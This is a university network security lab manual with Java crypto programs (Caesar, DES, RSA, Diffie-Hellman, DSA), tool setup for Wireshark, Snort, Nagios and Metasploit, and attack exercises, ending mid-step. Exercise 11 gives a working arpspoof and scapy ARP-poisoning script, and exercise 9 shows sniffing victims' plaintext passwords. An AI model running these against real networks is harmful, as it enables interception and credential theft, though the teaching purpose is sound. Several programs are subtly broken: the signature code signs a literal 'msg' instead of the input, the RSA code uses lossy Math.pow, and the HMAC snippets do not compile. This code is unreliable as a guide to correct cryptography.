Ex.

No : 1 a) Implementation Of Symmetric Key

Date : Algorithm-Ceaser cipher

AIM:
To encrypt and decrypt the given message by using Ceaser Cipher encryption algorithm.
ALGORITHM:
1. In Ceaser Cipher each letter in the plaintext is replaced by a letter some fixed number of
positions down the alphabet.
2. For example, with a left shift of 3, D would be replaced by A, E would become B, and so
on.
3. The encryption can also be represented using modular arithmetic by first transforming the
letters into numbers, according to the scheme, A = 0, B = 1, Z = 25.
4. Encryption of a letter x by a shift n can be described mathematically as,
En(x) = (x + n) mod26
5. Decryption is performed similarly,
Dn (x)=(x - n) mod26
PROGRAM:
CaesarCipher.java
class caesarCipher {
public static String encode(String enc, int offset) {
offset = offset % 26 + 26;
StringBuilder encoded = new StringBuilder();
for (char i : enc.toCharArray()) {
if (Character.isLetter(i)) {
if (Character.isUpperCase(i)) {
encoded.append((char) ('A' + (i - 'A' + offset) % 26));
} else {
encoded.append((char) ('a' + (i - 'a' + offset) % 26));
}
} else {
encoded.append(i);
 }
}
return encoded.toString();
}

public static String decode(String enc, int offset) {

return encode(enc, 26 - offset);
}

public static void main(String[] args) throws java.lang.Exception {

String msg = "Anna University";
System.out.println("Simulating Caesar Cipher\n------------------------");
System.out.println("Input : " + msg);
System.out.printf("Encrypted Message : ");
System.out.println(caesarCipher.encode(msg, 3));
System.out.printf("Decrypted Message : ");
System.out.println(caesarCipher.decode(caesarCipher.encode(msg, 3), 3));
}
}
OUTPUT:
Simulating Caesar Cipher ------------------------
Input : Anna University
Encrypted Message : Dqqd Xqlyhuvlwb
Decrypted Message : Anna University

RESULT:
Thus the encryption and decryption of the given message by using Ceaser Cipher
encryption algorithm has been done and verified successfully
 Ex. No : 1 b) Implementation of symmetric key algorithm-
Date : DES Algorithm

AIM:
To implement symmetric key algorithm - Data Encryption Standard (DES) Algorithm
using Java.
ALGORITHM:
1. Create a DES Key.
2. Create a Cipher instance from Cipher class, specify the following information and
separated by a slash (/).
a. Algorithm name
b. Mode (optional)
c. Padding scheme (optional)
3. Convert String into Byte[] array format.
4. Make Cipher in encrypt mode, and encrypt it with Cipher.doFinal() method.
5. Make Cipher in decrypt mode, and decrypt it with Cipher.doFinal() method.
PROGRAM:
DES.java
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.KeyGenerator;
import javax.crypto.NoSuchPaddingException;
import javax.crypto.SecretKey;

public class DES

{
public static void main(String[] argv) {
 try{
System.out.println("Message Encryption Using DES Algorithm\n-------");
KeyGenerator keygenerator = KeyGenerator.getInstance("DES");
SecretKey myDesKey = keygenerator.generateKey();
Cipher desCipher;
desCipher = Cipher.getInstance("DES/ECB/PKCS5Padding");
desCipher.init(Cipher.ENCRYPT_MODE, myDesKey);
byte[] text = "Secret Information ".getBytes();
System.out.println("Message [Byte Format] : " + text);
System.out.println("Message : " + new String(text));
byte[] textEncrypted = desCipher.doFinal(text);
System.out.println("Encrypted Message: " + textEncrypted);
desCipher.init(Cipher.DECRYPT_MODE, myDesKey);
byte[] textDecrypted = desCipher.doFinal(textEncrypted);
System.out.println("Decrypted Message: " + new String(textDecrypted));

}catch(NoSuchAlgorithmException e){
e.printStackTrace();
}catch(NoSuchPaddingException e){
e.printStackTrace();
}catch(InvalidKeyException e){
e.printStackTrace();
}catch(IllegalBlockSizeException e){
e.printStackTrace();
}catch(BadPaddingException e){
e.printStackTrace();
}

}
}
OUTPUT:
Message Encryption Using DES Algorithm
------------------------------------------------------
Message [Byte Format] : [B@4dcbadb4
Message : Secret Information
Encrypted Message: [B@504bae78
Decrypted Message: Secret Information

RESULT:
Thus the java program for DES Algorithm has been implemented and the output verified
successfully.
 Ex. No : 2 Implementation of asymmetric key algorithm- RSA
algorithm
Date :

AIM:
To implement asymmetric key algorithms- RSA algorithm using java and html.
ALGORITHM:
1. Choose two prime number p and q
2. Compute the value of n and p
3. Find the value of e (public key)
4. Compute the value of d (private key) using gcd()
5. Do the encryption and decryption
a. Encryption is given as,
c = te mod n
b. Decryption is given as,
t = cd mod n
PROGRAM:
rsa.html
<html>
<head>

<title>RSA Encryption</title>

<meta name="viewport" content="width=device-width, initial-scale=1.0">

</head>
<body>
<center>
<h1>RSA Algorithm</h1>
<h2>Implemented Using HTML & Javascript</h2>
<hr>
<table>
<tr>
<td>Enter First Prime Number:</td>
<td><input type="number" value="53" id="p"></td>
</tr>
<tr>
<td>Enter Second Prime Number:</td>
<td><input type="number" value="59" id="q"></p>
</td>
</tr>
<tr>
<td>Enter the Message(cipher text):<br>[A=1, B=2,...]</td>
<td><input type="number" value="89" id="msg"></p>
</td>
</tr>
<tr>
<td>Public Key:</td>
<td>
<p id="publickey"></p>
</td>
</tr>
<tr>
<td>Exponent:</td>
<td>
<p id="exponent"></p>
</td>
</tr>
<tr>
<td>Private Key:</td>
<td>
<p id="privatekey"></p>
</td>
</tr>
<tr>
 <td>Cipher Text:</td>
<td>
<p id="ciphertext"></p>
</td>
</tr>
<tr>
<td><button onclick="RSA();">Apply RSA</button></td>
</tr>
</table>
</center>
</body>
<script type="text/javascript">
function RSA() {
var gcd, p, q, no, n, t, e, i, x;
gcd = function (a, b) { return (!b) ? a : gcd(b, a % b); };
p = document.getElementById('p').value;
q = document.getElementById('q').value;
no = document.getElementById('msg').value;
n = p * q;
t = (p - 1) * (q - 1);

for (e = 2; e < t; e++) {

if (gcd(e, t) == 1) {
break;
}
}

for (i = 0; i < 10; i++) {

x=1+i*t
if (x % e == 0) {
 d = x / e;
break;
}
}

ctt = Math.pow(no, e).toFixed(0);

ct = ctt % n;

dtt = Math.pow(ct, d).toFixed(0);

dt = dtt % n;

document.getElementById('publickey').innerHTML = n;
document.getElementById('exponent').innerHTML = e;
document.getElementById('privatekey').innerHTML = d;
document.getElementById('ciphertext').innerHTML = ct;
}
</script>
</html>
OUTPUT:
RSA –algorithm java program
import java.math.*;
import java.util.*;

class RSA {
public static void main(String args[])
{
int p, q, n, z, d = 0, e, i;

// The number to be encrypted and decrypted

int msg = 12;
double c;
BigInteger msgback;

// 1st prime number p

p = 3;

// 2nd prime number q

q = 11;
n = p * q;
z = (p - 1) * (q - 1);
System.out.println("the value of z = " + z);

for (e = 2; e < z; e++) {

// e is for public key exponent

if (gcd(e, z) == 1) {
break;
}
}
 System.out.println("the value of e = " + e);
for (i = 0; i <= 9; i++) {
int x = 1 + (i * z);

// d is for private key exponent

if (x % e == 0) {
d = x / e;
break;
}
}
System.out.println("the value of d = " + d);
c = (Math.pow(msg, e)) % n;
System.out.println("Encrypted message is : " + c);

// converting int value of n to BigInteger

BigInteger N = BigInteger.valueOf(n);

// converting float value of c to BigInteger

BigInteger C = BigDecimal.valueOf(c).toBigInteger();
msgback = (C.pow(d)).mod(N);
System.out.println("Decrypted message is : "
+ msgback);
}

static int gcd(int e, int z)

{
if (e == 0)
return z;
else
return gcd(z % e, e);
 }
}

OUTPUT:

RESULT:
Thus the RSA algorithm has been implemented using HTML & JAVA and the output has
been verified successfully.
 Ex. No : 3
Diffie-Hellman key exchange algorithm
Date :
AIM:
To implement the Diffie-Hellman Key Exchange algorithm for a given problem using
java .
ALGORITHM:
1. Alice and Bob publicly agree to use a modulus p = 23 and base g = 5 (which is a
primitive root modulo 23).
2. Alice chooses a secret integer a = 4, then sends Bob A = ga mod p
o A = 54 mod 23 = 4
3. Bob chooses a secret integer b = 3, then sends Alice B = gb mod p
o B = 53 mod 23 = 10
4. Alice computes s = Ba mod p
o s = 104 mod 23 = 18
5. Bob computes s = Ab mod p
o s = 43 mod 23 = 18
6. Alice and Bob now share a secret (the number 18).

PROGRAM:
DiffieHellman.java
class DiffieHellman {
public static void main(String args[]) {
int p = 23; /* publicly known (prime number) */
int g = 5; /* publicly known (primitive root) */
int x = 4; /* only Alice knows this secret */
int y = 3; /* only Bob knows this secret */
double aliceSends = (Math.pow(g, x)) % p;
double bobComputes = (Math.pow(aliceSends, y)) % p;
double bobSends = (Math.pow(g, y)) % p;
double aliceComputes = (Math.pow(bobSends, x)) % p;
double sharedSecret = (Math.pow(g, (x * y))) % p;
 System.out.println("simulation of Diffie-Hellman key exchange algorithm\n---------------
------------------------------");
System.out.println("Alice Sends : " + aliceSends);
System.out.println("Bob Computes : " + bobComputes);
System.out.println("Bob Sends : " + bobSends);
System.out.println("Alice Computes : " + aliceComputes);
System.out.println("Shared Secret : " + sharedSecret);
/* shared secrets should match and equality is transitive */
if ((aliceComputes == sharedSecret) && (aliceComputes == bobComputes))
System.out.println("Success: Shared Secrets Matches! " + sharedSecret);
else
System.out.println("Error: Shared Secrets does not Match");
}
}
OUTPUT:
simulation of Diffie-Hellman key exchange algorithm
-----------------------------------------------------------------
Alice Sends : 4.0
Bob Computes : 18.0
Bob Sends : 10.0
Alice Computes : 18.0
Shared Secret : 18.0
Success: Shared Secrets Matches! 18.0

RESULT:
Thus the Diffie-Hellman key exchange algorithm has been implemented using Java
Program and the output has been verified successfully.
 Ex. No : 4
Implementation of Digital Signature Scheme
Date :
AIM:
To implement the Digital Signature Schemes using java .

ALGORITHM:
1. Create a KeyPairGenerator object.
2. Initialize the KeyPairGenerator object.
3. Generate the KeyPairGenerator. ...
4. Get the private key from the pair.
5. Create a signature object.
6. Initialize the Signature object.
7. Add data to the Signature object
8. Calculate the Signature

PROGRAM:
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.PrivateKey;
import java.security.Signature;
import java.util.Scanner;
public class CreatingDigitalSignature {
public static void main(String args[]) throws Exception {
Scanner sc = new Scanner(System.in);
System.out.println("Enter some text");
String msg = sc.nextLine();
KeyPairGenerator keyPairGen = KeyPairGenerator.getInstance("DSA");
keyPairGen.initialize(2048);
KeyPair pair = keyPairGen.generateKeyPair();
PrivateKey privKey = pair.getPrivate();
Signature sign = Signature.getInstance("SHA256withDSA");
 sign.initSign(privKey);
byte[] bytes = "msg".getBytes();
sign.update(bytes);
byte[] signature = sign.sign();
System.out.println("Digital signature for given text: "+new String(signature, "UTF8"));
}
}
OUTPUT:
Enter some text
Hi how are you
Digital signature for given text: 0=@gRD???-?.???? /yGL?i??a!?

RESULT:
Thus the Digital Signature Scheme using java has been implemented and the output has
been verified successfully.
 Installation of Wire shark, tcpdump and observe data
Ex. No : 5 transferred in client-server communication using
UDP/TCP and identify the UDP/TCP datagram.
Date :

AIM:
To install and configure wireshark and tcpdump tools.
PROCEDURE:
Wireshark is a useful tool for capturing network traffic data. Network pros can make the
most of the tool by analyzing captured packets to see what that data means for troubleshooting.
Take the following steps to initiate a capture in Wireshark:
1. Open Wireshark.
2. Set a capture filter, and select the interface on which to capture.
3. Start the capture.
4. Generate traffic by connecting to a website, pinging a remote device or attempting any
other network connection.
5. Stop the capture.

Wireshark is powerful and has many options beyond this article's scope, including network
analysis and performance information. Also, note that Wireshark v3 organizes the output into
three vertically stacked window panes. Wireshark v4 uses the same three panes, but the Packet
Details pane is in the lower-left corner -- it was the middle pane in v3 -- and the Packet Bytes
pane is in the lower-right corner.

Select a frame in the Packet List pane

In the new Wireshark interface, the top pane summarizes the capture. It displays one or more
frames, along with the packet number, time, source, destination, protocol, length and info
fields.
Use the protocols, source and destination addresses, and ports columns to help you decide
which frame to examine. Click on a frame to select it, and then look at the two lower panes for
details.
The sample capture for these screenshots is a simple Who is query to www.iana.org. This
example generates DNS and other traffic that is handy for the explanations below.

Interpret the Packet Details pane

Before examining the various headers and contents, I'll briefly review the TCP/IP model to
help explain the results displayed in the lower-left Packet Details pane.

Frame content
This frame section provides Ethernet information, such as frame size, time of capture and the
physical interface on which the frame was captured.

Ethernet content
Next is Ethernet II content, including source and destination MAC addresses. Depending on
the frame's direction of travel, the local MAC address is either the source or destination address,
and the next network device's MAC address is the other.

IP content
Next is the IP section, with source and destination IP addresses and port numbers. For most
networks, the address structure is IPv4. Time-to-live information exists here, as does
fragmentation instructions. Finally, a field defines whether the packet uses TCP or UDP at the
transport layer

Transport content
Next is a section containing transport layer information. You should see either TCP or UDP
here, depending on the type of datagram captured. Remember, TCP uses the three-way
handshake to enumerate the data exchange, ensuring that the source device resends any lost
data.

Application content
The application layer information is at the bottom of the Packet Details pane but at the top of
the TCP/IP model. This information varies by service and protocol. For example, when using
HTTP, the pane includes instructions such as GET or the contents of the requested webpage.
For capture targeting, you see information with SMTP, Post Office Protocol 3 or Internet
Message Access Protocol. The same goes for services such as SSH, network file sharing, DNS,
etc.

Interpret payload information

The Packet Bytes pane in the lower-right corner of Wireshark displays the payload. This
content can be the end-user data security professionals worry about. Unencrypted protocols,
such as HTTP, Telnet, SMTP and others, don't protect the confidentiality of their payload, so
the data is shown in this window. I frequently demonstrated this in my tech courses using Telnet
-- the password was displayed in this pane.

RESULT:
Thus the Wire shark, tcpdump tools are installed and configured successfully.
 Ex. No : 6
Check message integrity and confidentiality using SSL
Date :
AIM:
To check the message integrity and confidentiality using SSL.
PROCEDURE:
Step 1:Computing a Symmetric Key (K), for the required HMAC algorithm, use
recommended key size. As discussed in the post on encryption/decryption we would be
using KeyGenerator.
KeyGenerator keygen = KeyGenerator.getInstance("HmacSHA512");
// Use a secure underlying hash for HMAC algorithm.
keygen.init(256);
// Explicitly initializing keyGenerator.
Specify key size, and trust the provider supplied randomness.
SecretKeyhmacKey = keygen.generateKey();
// SecretKey holds Symmetric Key(K)
Step 2: Compute MAC using Mac class by providing computed symmetric key (K), and plain
text message M to a secure HMAC algorithm.
Mac mac = Mac.getInstance("HmacSHA512");
// get access to Mac object which implements HmacSHA512 algorithm.
mac.init(newSecretKeySpec(hmacKey.getEncoded(), "HmacSHA512"));
// Initialize Mac object with symmetric key(K), same as with sender
mac.update(message.getBytes());
// add message data (M) to Mac object to compute Mac.
String senderMac = mac.doFinal();
// Compute MAC
Step 3: Send MAC to receiver side Message and computed MAC sent from sender to receiver.
Step 4: On the receiver’s side, re-compute MAC by providing symmetric key (K), plain text
message (M) to the same secure HMAC algorithm used on the sender side.
Mac mac = Mac.getInstance("HmacSHA512");
// get access to Mac object which implements same algorithm used on sender side
mac.init(newSecretKeySpec(hmacKey.getEncoded(), "HmacSHA512"));
// Initialize Mac object with symmetric key(K), same as with sender
mac.update(message.getBytes());
// add message data (M) to Mac object to compute Mac.
String receivedMac = mac.doFinal();
// Compute MAC
Step 5: Verify received MAC and re-computed MAC
If received MAC, and re-computed MAC are identical on the receiver side, M is received
untampered from the expected sender (party with symmetric key(K)).
if (macComputationAPI.computeMac(hmacKey, data).equals(mac)){
return"Authentication and Integrity checked cleared on Received message " + M;
} else {
return"Message " + M + " received on receiver side is tampered with, or doesn't come from the
expected sender";
}

RESULT:
Thus to check the message integrity and confidentiality using SSL has been done
successfully.
 Ex. No : 7
Demonstration of Intrusion Detection System(IDS)
Date :
AIM:
To demonstrate Intrusion Detection System (IDS) using Snort software tool.
STEPS FOR CONFIGURING AND INTRUSION DETECTION:
1. Download Snort from the Snort.org website. (http://www.snort.org/snort-downloads)
2. Download Rules(https://www.snort.org/snort-rules). You must register to get the rules. (You
should download these often)
3. Double click on the .exe to install snort. This will install snort in the “C:\Snort” folder.It is
important to have WinPcap (https://www.winpcap.org/install/) installed
4. Extract the Rules file. You will need WinRAR for the .gz file.
5. Copy all files from the “rules” folder of the extracted folder. Now paste the rules into
“C:\Snort\rules” folder.
6. Copy “snort.conf” file from the “etc” folder of the extracted folder. You must paste it into
“C:\Snort\etc” folder. Overwrite any existing file. Remember if you modify your snort.conf
file and download a new file, you must modify it for Snort to work.
7. Open a command prompt (cmd.exe) and navigate to folder “C:\Snort\bin” folder. ( at the
Prompt, type cd\snort\bin)
8. To start (execute) snort in sniffer mode use following command:
snort -dev -i 3
-i indicates the interface number. You must pick the correct interface number. In my case, it
is 3.
-dev is used to run snort to capture packets on your network.

To check the interface list, use following command:

snort -W

Finding an interface
You can tell which interface to use by looking at the Index number and finding Microsoft. As
you can see in the above example, the other interfaces are for VMWare. My interface is 3.
9. To run snort in IDS mode, you will need to configure the file “snort.conf” according to your
network environment.
10. To specify the network address that you want to protect in snort.conf file, look for the
following line.var HOME_NET 192.168.1.0/24 (You will normally see any here)
11. You may also want to set the addresses of DNS_SERVERS, if you have some on your
network.
Example:
example snort
12. Change the RULE_PATH variable to the path of rules folder.
var RULE_PATH c:\snort\rules
path to rules
13. Change the path of all library files with the name and path on your system. and you must
change the path of snort_dynamicpreprocessorvariable.
C:\Snort\lib\snort_dynamiccpreprocessor
You need to do this to all library files in the “C:\Snort\lib” folder. The old path might be:
“/usr/local/lib/…”. you will need to replace that path with your system path. Using
C:\Snort\lib
14. Change the path of the “dynamicengine” variable value in the “snort.conf” file..
Example:
dynamicengine C:\Snort\lib\snort_dynamicengine\sf_engine.dll
15 Add the paths for “include classification.config” and “include reference.config” files.
include c:\snort\etc\classification.config
include c:\snort\etc\reference.config
16. Remove the comment (#) on the line to allow ICMP rules, if it is commented with a #.
include $RULE_PATH/icmp.rules
17. You can also remove the comment of ICMP-info rules comment, if it is commented.
include $RULE_PATH/icmp-info.rules
18. To add log files to store alerts generated by snort, search for the “output log” test in
snort.conf and add the following line:
output alert_fast: snort-alerts.ids
19. Comment (add a #) the whitelist $WHITE_LIST_PATH/white_list.rules and the blacklist
Change the nested_ip inner , \ to nested_ip inner #, \
20. Comment out (#) following lines:
#preprocessor normalize_ip4
#preprocessor normalize_tcp: ips ecn stream
#preprocessor normalize_icmp4
#preprocessor normalize_ip6
#preprocessor normalize_icmp6
21. Save the “snort.conf” file.
22. To start snort in IDS mode, run the following command:
snort -c c:\snort\etc\snort.conf -l c:\snort\log -i 3
(Note: 3 is used for my interface card)
If a log is created, select the appropriate program to open it. You can use WordPard or
NotePad++ to read the file.
To generate Log files in ASCII mode, you can use following command while running snort
in IDS mode:
snort -A console -i3 -c c:\Snort\etc\snort.conf -l c:\Snort\log -K ascii
23. Scan the computer that is running snort from another computer by using PING or NMap
(ZenMap).
After scanning or during the scan you can check the snort-alerts.ids file in the log folder to
insure it is logging properly. You will see IP address folders appear.
Snort monitoring traffic –

RESULT:
Thus the Intrusion Detection System(IDS) has been demonstrated by using the Open
Source Snort Intrusion Detection Tool.
 Ex. No : 8
To Study and configure Firewall, VPN
Date :
AIM:
To Study and configure firewalls and VPN in providing security over the network.
PROCEDURE :
Create a New Project
1. Start OPNET IT Guru Academic Edition · Choose New from the File menu.
2. Select Project and click OK →Name the project ->VPN, and the scenario No Firewall ->
Click OK.
3. Click Quit on the Startup Wizard.
4. To remove the world background map,
Select the View menu -> Background -> Set Border Map -> Select NONE from the drop-down
menu->· Click OK.
Create and Configure the Network Initialize the network:
1. Open the Object Palette dialog box by clicking. Make sure that the internet toolbox item is
selected from the pull-down menu on the object palette.
2. Add the following objects from the palette to the project workspace (see the following
→figure for placement): Application Config , Profile Config, an ip32_cloud, one ppp_ server,
three ethernet4_slip8_gtwy routers, and two ppp _ wkstn hosts.
3. Rename the objects you added and connect those using PPP_DS1 links, as shown here:

Configure the nodes:

1. Right-click on the Applications node ->Edit Attributes -> Assign Default to the Application
Definitions attribute ->Click OK.
2. Right -> click on the Profiles node ->Edit Attributes ->Assign Sample Profiles to the Profile
Configuration attribute -> Click OK.
3. Right-click on the Server node -> Edit Attributes ->Assign All to the Application: Supported
Services attribute -> Click OK.
4. Right-click on the Sales A node -> Select Similar Nodes (make sure that both Sales A and
Sales B are selected).
a. Right-click on the Sales A node -> Edit Attributes -> Check the Apply Changes to Selected
Objects check-box.
b. Expand the Application: Supported Profiles attribute · Set rows to 1-> Expand the row 0
hierarchy -> Profile Name = Sales Person ( this is one of the “sample profiles”)
5. Click OK, and Save your project.
Choose the Statistics
1. Right-click anywhere in the project workspace and select Choose Individual Statistics from
the popup menu.
2. In the Choose Results dialog box, check the following statistics: a. Global Statistics · DB
Query · Response Time (sec). b. Global Statistics · HTTP · Page Response Time (seconds). 3.
Click OK.
4. Right-click on Sales A node, and select Choose Individual Statistics from the menu. In the
Choose Results dialog box, check the following statistics: a. Client DB · Traffic Received
(bytes/sec). b. Client Http · Traffic Received (bytes/sec).
5. Click OK.
6. Right-click on the Sales B node, and select Choose Individual Statistics from the pop up
menu. In the Choose Results dialog box, check the following statistics:
a. Client DB · Traffic Received (bytes/sec).
b. Client Http · Traffic Received (bytes/sec).
7. Click OK, and save your project.

The Firewall Scenario

In the network we just created, the Sales Person profile allows both sales sites to access
applications such as database access, email, and Web browsing from the server (check the
Profile Configuration of the Profiles node). Assume that we need to protect the database in the
server from external access, including the salespeople. One way to do that is to replace Router
C with a firewall as follows:
1. Select Duplicate Scenario from the Scenarios menu and name it Firewall -> Click OK.
2. In the new scenario, right-click on Router C ->Edit Attributes.
3. Assign ethernet2_slip8_firewall to the model attribute.
4. Expand the hierarchy of the Proxy Server Information attribute ·
• Expand the row 1, which is for the database application hierarchy
• Assign No to the Proxy Server Deployed attribute as shown:
5. Click OK, and Save your project.
Our Firewall configuration does not allow database-related traffic to pass through the firewall
(it filters such packets out). This way, the databases in the server are protected from external
access. Your Firewall scenario should look like the following figure.

The Firewall_VPN Scenario In the Firewall scenario, we protected the databases in the server
from “any” external access using a firewall router. Assume that we want to allow the people in
the Sales A site to have access to the databases in the server. Because the firewall filters all
database-related traffic regardless of the source of the traffic, we need to consider the VPN
solution. A virtual tunnel can be used by Sales A to send database requests to the server.
The firewall will not filter the traffic created by Sales A because the IP packets in the tunnel
will be encapsulated inside an IP datagram.
1. While you are in the Firewall scenario, select Duplicate Scenario from the Scenarios menu
and give it the name Firewall_VPN · Click OK.
2. Remove the link between Router C and the Server.
3. Open the Object Palette dialog box by clicking. Make sure that the internet toolbox is
selected from the pull-down menu on the object palette.
a. Add to the project workspace one ethernet4_slip8_gtwy and one IP VPN
Config (see the following figure for placement).
b. From the Object palette, use two PPP_DS1 links to connect the new router to the Router C
(the firewall) and to the Server, as shown in the following figure.
c. Close the Object Palette dialog box.
4. Rename the IP VPN Config object to VPN.
5. Rename the new router to Router D as shown in the following figure:
Configure the VPN:
Right-click on the VPN node ->Edit Attributes->A
1. Expand the VPN Configuration hierarchy -> Set rows to 1 -> Expand row 0 hierarchies -
>Edit the value of Tunnel Source Name and enter Router A -> Edit the value of Tunnel
Destination Name and enter Router D.
2. Expand the Remote Client List hierarchy -> Set rows to 1 -> Expand row 0 hierarchy
Edit the value of Client Node Name and enter Sales A.
3. Click OK, and Save your project.

Simulating encryption:
A virtual tunnel between the Sales A and the Server does not guarantee security for the contents
of the transferred database packets. If the contents of these packets are confidential, encryption
of these packets will be needed. In OPNET AE, the effect of packet encryption can be simulated
by the available compression function. Two of the available compression schemes are the Per-
Interface Compression and the Per-Virtual Circuit Compression, as shown in the following
figure. Once you edit the Compression Information attribute of an interface, OPNET adds the
IP Config node to the project.

Per-Interface Compression compresses the entire packet (including the headers). This means
the packet is decompressed and compressed at each hop on the route. Per-Virtual Circuit
Compression compresses the packet payload only. Therefore, compression and decompression
take place only at the end nodes. One of the exercises at the end of this lab requires you to
create a new scenario to utilize the compression function.
Run the Simulation To run the simulation for the three scenarios simultaneously:
1. Go to the Scenarios menu · Select Manage Scenarios.
2. Change the values under the Results column to (or) for the three scenarios. Keep the default
value of the Sim Duration (1 hour). Compare with the following figure.

3. Click OK to run the three simulations. Depending on the speed of your processor, this task
may take several seconds to complete.
4. After the three simulation runs complete, one for each scenario, click Close.
View the Results To view and analyze the results:
1. Select Compare Results from the Results menu.
2. Expand the Sales A hierarchy · Expand the Client DB hierarchy · Select the Traffic Received
statistic.
3. Change the drop-down menu in the middle-lower part of the Compare Results dialog box
from As Is to time average as shown.
4. Press Show and the resulting graph should resemble the following figure. Your graph may
not match exactly because of node placement.

4. Create a graph similar to the previous one, but for Sales B

5.Create two graphs similar to the previous ones to depict the Traffic Received by the Client
Http for Sales A and Sales B.

RESULT:
Thus the configuration of firewall and VPN has been studied and configured properly.
 Ex. No : 9 Experiment Using Eavesdropping,Dictionary
Date : attack,MITM attack

AIM:
To observe how network traffic can be intercepted using packet-sniffing tools.
Materials Required:
- Two or more computers connected to the same network (LAN or Wi-Fi)
- Wireshark (a packet-sniffing tool) installed on one computer
PROCEDURE:
1.Setup the Network
- Connect all computers to the same network.
- Assign one computer as the victim (sending data) and another as the attacker (sniffing data).
2. Start Packet Capturing
- Open Wireshark on the attacker’s computer.
- Select the active network interface (Wi-Fi/Ethernet).
- Click "Start Capture" to begin monitoring traffic.

3. Generate Network Traffic

- On the victim’s computer, visit a website (preferably an HTTP site).
- Login to a test service or send some unencrypted messages.

4. Analyze Captured Data

- Stop the packet capture in Wireshark.
- Filter packets using keywords like "http" or "ftp" to find unencrypted data.
 - Look for readable usernames, passwords, or messages in the captured packets.
- Locate the HTTP POST request corresponding to the form submission.
http.request.method == "POST"

Right-click on the packet and select the Stream to view the data in a readable format.
- Observe that the username and password are transmitted in plaintext.
5. Preventive Measures
- Use HTTPS websites instead of HTTP.
- Enable network encryption (WPA2/WPA3 for Wi-Fi).
- Avoid public networks for sensitive activities.
- The attacker can see unencrypted traffic, including possible usernames and passwords.
- Secure communication (HTTPS, VPN) prevents data from being readable.

RESULT:
Thus the network trafficing using packet-sniffing tools has been done and verified
successfully.
 Ex. No :10
Installation and Working of Network Monitoring Tool – Nagios
Date :

AIM :

To install and configure Nagios Core for monitoring hosts and services in a network, and to
demonstrate its functionality in a network security lab environment.

ALGORITHM :

1. System Preparation:
• Use a compatible Linux distribution (preferably Ubuntu Server or CentOS).
• Update system packages:
sudo apt update && sudo apt upgrade
2. Install Dependencies:
• Install required packages:
sudo apt install apache2 php libapache2-mod-php php-gd build-essential libgd-dev
unzip wget
3. Create Nagios User and Group:
• Add Nagios user:
sudo useradd nagios
sudo usermod -a -G nagios www-data
4. Download and Install Nagios Core:
• Download source:
wget https://assets.nagios.com/downloads/nagioscore/releases/nagios-4.x.x.tar.gz

• Extract and compile:

tar -xvzf nagios-4.x.x.tar.gz
cd nagios-4.x.x
./configure --with-httpd-conf=/etc/apache2/sites-enabled
make all
sudo make install
sudo make install-commandmode
sudo make install-init
sudo make install-config
 sudo make install-webconf
5. Set Web Access:
• Set up Nagios web admin user:
sudo htpasswd -c /usr/local/nagios/etc/htpasswd.users nagiosadmin

• Restart Apache:
sudo systemctl restart apache2
6. Install and Configure Nagios Plugins:
• Download and install plugins:
wget https://nagios-plugins.org/download/nagios-plugins-2.x.x.tar.gz
tar -xvzf nagios-plugins-2.x.x.tar.gz
cd nagios-plugins-2.x.x
./configure
make
sudo make install
7. Start Nagios:
• Enable and start service:
sudo systemctl enable nagios
sudo systemctl start nagios
8. Access Nagios Web Interface:
• Open browser and go to:
http://<your-server-ip>/nagios
- Log in using the credentials set during web access setup.
9. Add Hosts and Services:
• Edit configuration files to add hosts/services:
sudo nano /usr/local/nagios/etc/servers/host.cfg
- Include this file in nagios.cfg and restart Nagios.

RESULT :
Nagios Core was successfully installed and configured on the system.
 Ex. No :11 Experiment with sniff Traffic Using ARP poisoning
Date :
AIM :
To demonstrate how ARP poisoning can be used to sniff network traffic and understand its
implications in network security.

ALGORITHM :
Step 1: Enable IP Forwarding
1. Open the terminal in Kali Linux (or any Linux system).
2. Enable IP forwarding to allow the attacker's machine to forward network
packets:
echo 1 > /proc/sys/net/ipv4/ip_forward
Step 2: Identify Target Devices
1. Find the target device’s IP and MAC addresses using:
arp -a
OR
nmap -sn 192.168.1.0/24
2. Note down the victim's IP and gateway's IP.
Step 3: ARP Spoofing (Poisoning the ARP Cache)
1. Start ARP poisoning using arpspoof:
arpspoof -i eth0 -t <victim-IP> <gateway-IP>
arpspoof -i eth0 -t <gateway-IP> <victim-IP>
2. This sends forged ARP responses, making the victim send traffic through the attacker.
Step 4: Sniff Network Traffic Using Wireshark
1. Open Wireshark and start capturing packets on the attacker's active interface.
2. Use a filter to view relevant traffic (e.g., HTTP, TCP):
http || tcp
3.Look for sensitive information such as usernames, passwords, and URLs.Step 5: Stop the
Attack and Restore Network
1. Stop ARP spoofing by pressing Ctrl + C in the terminal.
2. Disable IP forwarding:
echo 0 > /proc/sys/net/ipv4/ip_forward
3.Flush the ARP cache to restore normal network operation:
arp -d <victim-IP>
arp -d <gateway-IP>
Program :
from scapy.all import ARP, send
import time
def arp_poison(target_ip, spoof_ip):
packet = ARP(op=2, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff", psrc=spoof_ip)
send(packet, verbose=False)
victim_ip = "192.168.1.5" # Replace with victim's IP
gateway_ip = "192.168.1.1" # Replace with gateway's IP
try:
print("Starting ARP Spoofing...")
while True:
arp_poison(victim_ip, gateway_ip)
arp_poison(gateway_ip, victim_ip)
time.sleep(2)
except KeyboardInterrupt:
print("Stopping ARP Spoofing.")
Expected Output :
Terminal output ;
Starting ARP Spoofing...
Sent 1 packets
Sent 1 packets
Sent 1 packets
Sent 1 packets
...
Stopping ARP Spoofing.
Result :
Thus, the ARP poisoning attack was successfully performed, and network traffic was
intercepted. Security measures like firewalls and VPNs help prevent such attacks in public
networks.
 CONTENT BEYOND THE SYALLABUS
Ex. No :12
Metasploit Installation and Configuration
Date :
AIM :
To install and configure the Metasploit Framework and demonstrate its working in a network
security environment by simulating a basic penetration testing scenario.

ALGORITHM :
1. System Preparation:
- Ensure the system is running a compatible OS (e.g., Kali Linux, Parrot OS, or Ubuntu).
- Update the system using:
sudo apt update && sudo apt upgrade
2. Install Metasploit Framework:
- On Kali Linux, Metasploit is pre-installed. Otherwise, use:
curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/msfupdate |
sudo bash
3. Start Metasploit Console:
- Launch the console with:
msfconsole
4. Information Gathering:
- Use tools like nmap to scan the target IP:
nmap -sV [target-ip]
5. Search for Exploit:
- Inside msfconsole, use:
search [service name or vulnerability]
6. Set Exploit and Payload:
